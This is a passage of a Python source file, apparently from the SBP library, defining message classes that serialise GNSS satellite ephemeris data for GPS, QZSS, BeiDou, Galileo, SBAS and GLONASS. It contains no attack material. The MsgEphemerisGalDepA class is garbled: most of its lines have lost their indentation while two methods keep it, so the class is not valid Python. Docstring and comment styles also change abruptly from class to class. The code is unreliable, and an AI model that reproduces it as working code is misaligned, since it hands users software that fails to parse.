    # _build_payload serializes it through self.parser inside pack_into.
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGPS._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Refresh framing fields, then overlay this message's own fields.
    self.to_binary()
    d = super( MsgEphemerisGPS, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_EPHEMERIS_QZSS = 0x008E
class MsgEphemerisQzss(SBP):
  """SBP class for message MSG_EPHEMERIS_QZSS (0x008E).

  You can have MSG_EPHEMERIS_QZSS inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  The ephemeris message returns a set of satellite orbit
  parameters that is used to calculate QZSS satellite position,
  velocity, and clock offset.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : EphemerisCommonContent
    Values common for all ephemeris types
  tgd : float
    Group delay differential between L1 and L2
  c_rs : float
    Amplitude of the sine harmonic correction term to the orbit radius
  c_rc : float
    Amplitude of the cosine harmonic correction term to the orbit radius
  c_uc : float
    Amplitude of the cosine harmonic correction term to the argument of latitude
  c_us : float
    Amplitude of the sine harmonic correction term to the argument of latitude
  c_ic : float
    Amplitude of the cosine harmonic correction term to the angle of inclination
  c_is : float
    Amplitude of the sine harmonic correction term to the angle of inclination
  dn : double
    Mean motion difference
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  inc_dot : double
    Inclination first derivative
  af0 : float
    Polynomial clock correction coefficient (clock bias)
  af1 : float
    Polynomial clock correction coefficient (clock drift)
  af2 : float
    Polynomial clock correction coefficient (rate of clock drift)
  toc : GPSTimeSec
    Clock reference
  iode : int
    Issue of ephemeris data
  iodc : int
    Issue of clock data
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
  """
  # Wire-format layout of the payload (little-endian fields); identical
  # field set to MSG_EPHEMERIS_GPS.  Declaration order defines byte order
  # on the wire and must stay in sync with __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContent._parser),
    'tgd' / construct.Float32l,
    'c_rs' / construct.Float32l,
    'c_rc' / construct.Float32l,
    'c_uc' / construct.Float32l,
    'c_us' / construct.Float32l,
    'c_ic' / construct.Float32l,
    'c_is' / construct.Float32l,
    'dn' / construct.Float64l,
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'inc_dot' / construct.Float64l,
    'af0' / construct.Float32l,
    'af1' / construct.Float32l,
    'af2' / construct.Float32l,
    'toc' / construct.Struct(GPSTimeSec._parser),
    'iode' / construct.Int8ul,
    'iodc' / construct.Int16ul,)
  __slots__ = [
    'common',
    'tgd',
    'c_rs',
    'c_rc',
    'c_uc',
    'c_us',
    'c_ic',
    'c_is',
    'dn',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'inc_dot',
    'af0',
    'af1',
    'af2',
    'toc',
    'iode',
    'iodc',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      # Built from an existing SBP frame: copy framing fields, then decode
      # the payload into this message's slots.
      super( MsgEphemerisQzss,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      # Built inline from keyword arguments.
      super( MsgEphemerisQzss, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_QZSS
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.common = kwargs.pop('common')
      self.tgd = kwargs.pop('tgd')
      self.c_rs = kwargs.pop('c_rs')
      self.c_rc = kwargs.pop('c_rc')
      self.c_uc = kwargs.pop('c_uc')
      self.c_us = kwargs.pop('c_us')
      self.c_ic = kwargs.pop('c_ic')
      self.c_is = kwargs.pop('c_is')
      self.dn = kwargs.pop('dn')
      self.m0 = kwargs.pop('m0')
      self.ecc = kwargs.pop('ecc')
      self.sqrta = kwargs.pop('sqrta')
      self.omega0 = kwargs.pop('omega0')
      self.omegadot = kwargs.pop('omegadot')
      self.w = kwargs.pop('w')
      self.inc = kwargs.pop('inc')
      self.inc_dot = kwargs.pop('inc_dot')
      self.af0 = kwargs.pop('af0')
      self.af1 = kwargs.pop('af1')
      self.af2 = kwargs.pop('af2')
      self.toc = kwargs.pop('toc')
      self.iode = kwargs.pop('iode')
      self.iodc = kwargs.pop('iodc')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.
    """
    d = json.loads(s)
    return MsgEphemerisQzss.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    sbp = SBP.from_json_dict(d)
    return MsgEphemerisQzss(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.
    """
    p = MsgEphemerisQzss._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.
    """
    c = containerize(exclude_fields(self))
    self.payload = MsgEphemerisQzss._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    # NOTE(review): payload is left as a container here; presumably
    # _build_payload serializes it through self.parser inside pack_into.
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisQzss._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Refresh framing fields, then overlay this message's own fields.
    self.to_binary()
    d = super( MsgEphemerisQzss, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_EPHEMERIS_BDS = 0x0089
class MsgEphemerisBds(SBP):
  """SBP class for message MSG_EPHEMERIS_BDS (0x0089).

  You can have MSG_EPHEMERIS_BDS inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  The ephemeris message returns a set of satellite orbit
  parameters that is used to calculate BDS satellite position,
  velocity, and clock offset. Please see the BeiDou Navigation
  Satellite System SIS-ICD Version 2.1, Table 5-9 for more details.

  Parameters
  ----------
  sbp : SBP
    SBP parent object to inherit from.
  common : EphemerisCommonContent
    Values common for all ephemeris types
  tgd1 : float
    Group delay differential for B1
  tgd2 : float
    Group delay differential for B2
  c_rs : float
    Amplitude of the sine harmonic correction term to the orbit radius
  c_rc : float
    Amplitude of the cosine harmonic correction term to the orbit radius
  c_uc : float
    Amplitude of the cosine harmonic correction term to the argument of latitude
  c_us : float
    Amplitude of the sine harmonic correction term to the argument of latitude
  c_ic : float
    Amplitude of the cosine harmonic correction term to the angle of inclination
  c_is : float
    Amplitude of the sine harmonic correction term to the angle of inclination
  dn : double
    Mean motion difference
  m0 : double
    Mean anomaly at reference time
  ecc : double
    Eccentricity of satellite orbit
  sqrta : double
    Square root of the semi-major axis of orbit
  omega0 : double
    Longitude of ascending node of orbit plane at weekly epoch
  omegadot : double
    Rate of right ascension
  w : double
    Argument of perigee
  inc : double
    Inclination
  inc_dot : double
    Inclination first derivative
  af0 : double
    Polynomial clock correction coefficient (clock bias)
  af1 : float
    Polynomial clock correction coefficient (clock drift)
  af2 : float
    Polynomial clock correction coefficient (rate of clock drift)
  toc : GPSTimeSec
    Clock reference
  iode : int
    Issue of ephemeris data
    Calculated from the navigation data parameter t_oe per RTCM/CSNO recommendation:
    IODE = mod (t_oe / 720, 240)
  iodc : int
    Issue of clock data
    Calculated from the navigation data parameter t_oc per RTCM/CSNO recommendation:
    IODC = mod (t_oc / 720, 240)
  sender : int
    Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
  """
  # Wire-format layout of the payload (little-endian fields).  BDS carries
  # two group delays (tgd1/tgd2) and a double-precision af0, unlike the
  # GPS/QZSS variants.  Declaration order defines byte order on the wire
  # and must stay in sync with __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContent._parser),
    'tgd1' / construct.Float32l,
    'tgd2' / construct.Float32l,
    'c_rs' / construct.Float32l,
    'c_rc' / construct.Float32l,
    'c_uc' / construct.Float32l,
    'c_us' / construct.Float32l,
    'c_ic' / construct.Float32l,
    'c_is' / construct.Float32l,
    'dn' / construct.Float64l,
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'inc_dot' / construct.Float64l,
    'af0' / construct.Float64l,
    'af1' / construct.Float32l,
    'af2' / construct.Float32l,
    'toc' / construct.Struct(GPSTimeSec._parser),
    'iode' / construct.Int8ul,
    'iodc' / construct.Int16ul,)
  __slots__ = [
    'common',
    'tgd1',
    'tgd2',
    'c_rs',
    'c_rc',
    'c_uc',
    'c_us',
    'c_ic',
    'c_is',
    'dn',
    'm0',
    'ecc',
    'sqrta',
    'omega0',
    'omegadot',
    'w',
    'inc',
    'inc_dot',
    'af0',
    'af1',
    'af2',
    'toc',
    'iode',
    'iodc',
  ]

  def __init__(self, sbp=None, **kwargs):
    if sbp:
      # Built from an existing SBP frame: copy framing fields, then decode
      # the payload into this message's slots.
      super( MsgEphemerisBds,
             self).__init__(sbp.msg_type, sbp.sender, sbp.length,
                            sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      # Built inline from keyword arguments.
      super( MsgEphemerisBds, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_BDS
      self.sender = kwargs.pop('sender', SENDER_ID)
      self.common = kwargs.pop('common')
      self.tgd1 = kwargs.pop('tgd1')
      self.tgd2 = kwargs.pop('tgd2')
      self.c_rs = kwargs.pop('c_rs')
      self.c_rc = kwargs.pop('c_rc')
      self.c_uc = kwargs.pop('c_uc')
      self.c_us = kwargs.pop('c_us')
      self.c_ic = kwargs.pop('c_ic')
      self.c_is = kwargs.pop('c_is')
      self.dn = kwargs.pop('dn')
      self.m0 = kwargs.pop('m0')
      self.ecc = kwargs.pop('ecc')
      self.sqrta = kwargs.pop('sqrta')
      self.omega0 = kwargs.pop('omega0')
      self.omegadot = kwargs.pop('omegadot')
      self.w = kwargs.pop('w')
      self.inc = kwargs.pop('inc')
      self.inc_dot = kwargs.pop('inc_dot')
      self.af0 = kwargs.pop('af0')
      self.af1 = kwargs.pop('af1')
      self.af2 = kwargs.pop('af2')
      self.toc = kwargs.pop('toc')
      self.iode = kwargs.pop('iode')
      self.iodc = kwargs.pop('iodc')

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Given a JSON-encoded string s, build a message object.
    """
    d = json.loads(s)
    return MsgEphemerisBds.from_json_dict(d)

  @staticmethod
  def from_json_dict(d):
    sbp = SBP.from_json_dict(d)
    return MsgEphemerisBds(sbp, **d)

  def from_binary(self, d):
    """Given a binary payload d, update the appropriate payload fields of
    the message.
    """
    p = MsgEphemerisBds._parser.parse(d)
    for n in self.__class__.__slots__:
      setattr(self, n, getattr(p, n))

  def to_binary(self):
    """Produce a framed/packed SBP message.
    """
    c = containerize(exclude_fields(self))
    self.payload = MsgEphemerisBds._parser.build(c)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    # NOTE(review): payload is left as a container here; presumably
    # _build_payload serializes it through self.parser inside pack_into.
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisBds._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    # Refresh framing fields, then overlay this message's own fields.
    self.to_binary()
    d = super( MsgEphemerisBds, self).to_json_dict()
    j = walk_json_dict(exclude_fields(self))
    d.update(j)
    return d
SBP_MSG_EPHEMERIS_GAL_DEP_A = 0x0095
class MsgEphemerisGalDepA(SBP):
"""SBP class for message MSG_EPHEMERIS_GAL_DEP_A (0x0095).
You can have MSG_EPHEMERIS_GAL_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This observation message has been deprecated in favor of
an ephemeris message with explicit source of NAV data.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
bgd_e1e5a : float
E1-E5a Broadcast Group Delay
bgd_e1e5b : float
E1-E5b Broadcast Group Delay
c_rs : float
Amplitude of the sine harmonic correction term to the orbit radius
c_rc : float
Amplitude of the cosine harmonic correction term to the orbit radius
c_uc : float
Amplitude of the cosine harmonic correction term to the argument of latitude
c_us : float
Amplitude of the sine harmonic correction term to the argument of latitude
c_ic : float
Amplitude of the cosine harmonic correction term to the angle of inclination
c_is : float
Amplitude of the sine harmonic correction term to the angle of inclination
dn : double
Mean motion difference
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
inc_dot : double
Inclination first derivative
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
af2 : float
Polynomial clock correction coefficient (rate of clock drift)
toc : GPSTimeSec
Clock reference
iode : int
Issue of data (IODnav)
iodc : int
Issue of data (IODnav). Always equal to iode
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'bgd_e1e5a' / construct.Float32l,
'bgd_e1e5b' / construct.Float32l,
'c_rs' / construct.Float32l,
'c_rc' / construct.Float32l,
'c_uc' / construct.Float32l,
'c_us' / construct.Float32l,
'c_ic' / construct.Float32l,
'c_is' / construct.Float32l,
'dn' / construct.Float64l,
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'inc_dot' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,
'af2' / construct.Float32l,
'toc' / construct.Struct(GPSTimeSec._parser),
'iode' / construct.Int16ul,
'iodc' / construct.Int16ul,)
__slots__ = [
'common',
'bgd_e1e5a',
'bgd_e1e5b',
'c_rs',
'c_rc',
'c_uc',
'c_us',
'c_ic',
'c_is',
'dn',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'inc_dot',
'af0',
'af1',
'af2',
'toc',
'iode',
'iodc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGalDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGalDepA, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GAL_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.bgd_e1e5a = kwargs.pop('bgd_e1e5a')
self.bgd_e1e5b = kwargs.pop('bgd_e1e5b')
self.c_rs = kwargs.pop('c_rs')
self.c_rc = kwargs.pop('c_rc')
self.c_uc = kwargs.pop('c_uc')
self.c_us = kwargs.pop('c_us')
self.c_ic = kwargs.pop('c_ic')
self.c_is = kwargs.pop('c_is')
self.dn = kwargs.pop('dn')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.inc_dot = kwargs.pop('inc_dot')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
self.af2 = kwargs.pop('af2')
self.toc = kwargs.pop('toc')
self.iode = kwargs.pop('iode')
self.iodc = kwargs.pop('iodc')
  def __repr__(self):
    # Delegate to the shared SBP repr formatter.
    return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGalDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGalDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGalDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGalDepA._parser.build(c)
return self.pack()
  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into the provided buffer and offset.
    """
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGalDepA._parser
    # Point the shared stream writer at the caller's buffer before packing.
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgEphemerisGalDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_EPHEMERIS_GAL = 0x008D
class MsgEphemerisGal(SBP):
  """SBP class for message MSG_EPHEMERIS_GAL (0x008D).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  Carries the Galileo satellite orbit parameters used to compute
  satellite position, velocity and clock offset; see the Galileo
  OS SIS ICD, Issue 1.3, December 2016 for details.

  Fields
  ------
  common (EphemerisCommonContent) : values common to all ephemeris types
  bgd_e1e5a, bgd_e1e5b (float) : E1-E5a / E1-E5b broadcast group delays
  c_rs, c_rc (float) : sine/cosine harmonic corrections to the orbit radius
  c_uc, c_us (float) : cosine/sine harmonic corrections to the argument
      of latitude
  c_ic, c_is (float) : cosine/sine harmonic corrections to the angle of
      inclination
  dn (double) : mean motion difference
  m0 (double) : mean anomaly at reference time
  ecc (double) : eccentricity of satellite orbit
  sqrta (double) : square root of the semi-major axis of orbit
  omega0 (double) : longitude of ascending node at weekly epoch
  omegadot (double) : rate of right ascension
  w (double) : argument of perigee
  inc, inc_dot (double) : inclination and its first derivative
  af0, af1 (double), af2 (float) : clock bias / drift / drift-rate
      polynomial coefficients
  toc (GPSTimeSec) : clock reference
  iode, iodc (int) : issue of data (IODnav); iodc always equals iode
  source (int) : 0=I/NAV, 1=F/NAV
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContent._parser),
    'bgd_e1e5a' / construct.Float32l,
    'bgd_e1e5b' / construct.Float32l,
    'c_rs' / construct.Float32l,
    'c_rc' / construct.Float32l,
    'c_uc' / construct.Float32l,
    'c_us' / construct.Float32l,
    'c_ic' / construct.Float32l,
    'c_is' / construct.Float32l,
    'dn' / construct.Float64l,
    'm0' / construct.Float64l,
    'ecc' / construct.Float64l,
    'sqrta' / construct.Float64l,
    'omega0' / construct.Float64l,
    'omegadot' / construct.Float64l,
    'w' / construct.Float64l,
    'inc' / construct.Float64l,
    'inc_dot' / construct.Float64l,
    'af0' / construct.Float64l,
    'af1' / construct.Float64l,
    'af2' / construct.Float32l,
    'toc' / construct.Struct(GPSTimeSec._parser),
    'iode' / construct.Int16ul,
    'iodc' / construct.Int16ul,
    'source' / construct.Int8ul,)
  __slots__ = ['common', 'bgd_e1e5a', 'bgd_e1e5b', 'c_rs', 'c_rc',
               'c_uc', 'c_us', 'c_ic', 'c_is', 'dn', 'm0', 'ecc',
               'sqrta', 'omega0', 'omegadot', 'w', 'inc', 'inc_dot',
               'af0', 'af1', 'af2', 'toc', 'iode', 'iodc', 'source']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisGal, self).__init__(sbp.msg_type, sbp.sender,
                                            sbp.length, sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisGal, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GAL
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisGal.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisGal from the JSON-encoded string s."""
    return MsgEphemerisGal.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisGal from a decoded JSON dict d."""
    return MsgEphemerisGal(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisGal._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGal._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGal._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisGal, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_SBAS_DEP_A = 0x0082
class MsgEphemerisSbasDepA(SBP):
  """SBP class for message MSG_EPHEMERIS_SBAS_DEP_A (0x0082).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  Fields
  ------
  common (EphemerisCommonContentDepA) : values common to all ephemeris types
  pos, vel, acc (array) : position / velocity / acceleration of the GEO
      at time toe
  a_gf0, a_gf1 (double) : time offset and drift of the GEO clock w.r.t.
      SBAS Network Time
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepA._parser),
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float64l),
    'acc' / construct.Array(3, construct.Float64l),
    'a_gf0' / construct.Float64l,
    'a_gf1' / construct.Float64l,)
  __slots__ = ['common', 'pos', 'vel', 'acc', 'a_gf0', 'a_gf1']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisSbasDepA, self).__init__(sbp.msg_type, sbp.sender,
                                                 sbp.length, sbp.payload,
                                                 sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisSbasDepA, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_SBAS_DEP_A
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisSbasDepA.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisSbasDepA from the JSON-encoded string s."""
    return MsgEphemerisSbasDepA.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisSbasDepA from a decoded JSON dict d."""
    return MsgEphemerisSbasDepA(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisSbasDepA._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisSbasDepA._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisSbasDepA._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisSbasDepA, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_GLO_DEP_A = 0x0083
class MsgEphemerisGloDepA(SBP):
  """SBP class for message MSG_EPHEMERIS_GLO_DEP_A (0x0083).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  Carries the GLO satellite orbit parameters used to compute satellite
  position, velocity and clock offset; see the GLO ICD 5.1 "Table 4.5
  Characteristics of words of immediate information (ephemeris
  parameters)" for details.

  Fields
  ------
  common (EphemerisCommonContentDepA) : values common to all ephemeris types
  gamma (double) : relative deviation of predicted carrier frequency
      from nominal
  tau (double) : correction to the SV time
  pos, vel, acc (array) : position / velocity / acceleration of the SV
      at tb in the PZ-90.02 coordinate system
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepA._parser),
    'gamma' / construct.Float64l,
    'tau' / construct.Float64l,
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float64l),
    'acc' / construct.Array(3, construct.Float64l),)
  __slots__ = ['common', 'gamma', 'tau', 'pos', 'vel', 'acc']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisGloDepA, self).__init__(sbp.msg_type, sbp.sender,
                                                sbp.length, sbp.payload,
                                                sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisGloDepA, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_A
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisGloDepA.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisGloDepA from the JSON-encoded string s."""
    return MsgEphemerisGloDepA.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisGloDepA from a decoded JSON dict d."""
    return MsgEphemerisGloDepA(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisGloDepA._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGloDepA._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGloDepA._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisGloDepA, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_SBAS_DEP_B = 0x0084
class MsgEphemerisSbasDepB(SBP):
  """SBP class for message MSG_EPHEMERIS_SBAS_DEP_B (0x0084).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  This observation message has been deprecated in favor of the
  ephemeris message using floats for size reduction.

  Fields
  ------
  common (EphemerisCommonContentDepB) : values common to all ephemeris types
  pos, vel, acc (array) : position / velocity / acceleration of the GEO
      at time toe
  a_gf0, a_gf1 (double) : time offset and drift of the GEO clock w.r.t.
      SBAS Network Time
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepB._parser),
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float64l),
    'acc' / construct.Array(3, construct.Float64l),
    'a_gf0' / construct.Float64l,
    'a_gf1' / construct.Float64l,)
  __slots__ = ['common', 'pos', 'vel', 'acc', 'a_gf0', 'a_gf1']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisSbasDepB, self).__init__(sbp.msg_type, sbp.sender,
                                                 sbp.length, sbp.payload,
                                                 sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisSbasDepB, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_SBAS_DEP_B
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisSbasDepB.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisSbasDepB from the JSON-encoded string s."""
    return MsgEphemerisSbasDepB.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisSbasDepB from a decoded JSON dict d."""
    return MsgEphemerisSbasDepB(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisSbasDepB._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisSbasDepB._parser.build(container)
